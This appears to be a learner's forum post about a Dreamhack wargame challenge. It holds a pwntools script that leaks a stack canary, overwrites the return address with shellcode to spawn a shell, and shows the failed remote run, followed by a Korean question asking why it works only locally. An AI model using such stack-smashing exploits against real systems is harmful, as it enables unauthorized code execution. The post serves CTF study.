from pwn import *

def slog(n, m):
return success(": ".join([n, hex(m)]))
p = remote("host3.dreamhack.games", 10234)
context.arch = "amd64"

£ [1] Get inforamtion about buf
p.recvuntil("buf: ")
buf = int(p.recvline()[:-1], 16)
slog("Address of buf", buf)

p.recvuntil("$rbp: ")
buf2sfp = int(p.recvline().split()[0])
buf2cnry = buf2sfp - 8
slog("buf <=> sfp", buf2sfp)
slog("buf <=> canary", buf2cnry)

£ [2] Leak canary value
payload = b"A"*(buf2cnry + 1)
p.sendafter("Input:" ,payload)
p.recvuntil(payload)
cnry = u64(b"\x00" + p.recvn(7))
slog("Canary", cnry)

£ [3] Exploit
sh = asm(shellcraft.sh())
payload = sh.ljust(buf2cnry, b"A")
payload += p64(cnry)
payload += b"B" * 8
payload += p64(buf)

p.sendlineafter("Input:", payload)

p.interactive()

--결과는
[+] Opening connection to host3.dreamhack.games on port 10234: Done
[+] Address of buf: 0x7fffd3c518f0
[+] buf <=> sfp: 0x60
[+] buf <=> canary: 0x58
[+] Canary: 0x325b0a27bab65900
[] Switching to interactive mode
[] Got EOF while reading in interactive
$ id
$ ls
[] Closed connection to host3.dreamhack.games port 10234
[] Got EOF while sending in interactive

다들 동일하게 하신것 같은데 왜 안될까요.ㅠㅠ 로컬에서는 잘 돌아요.;;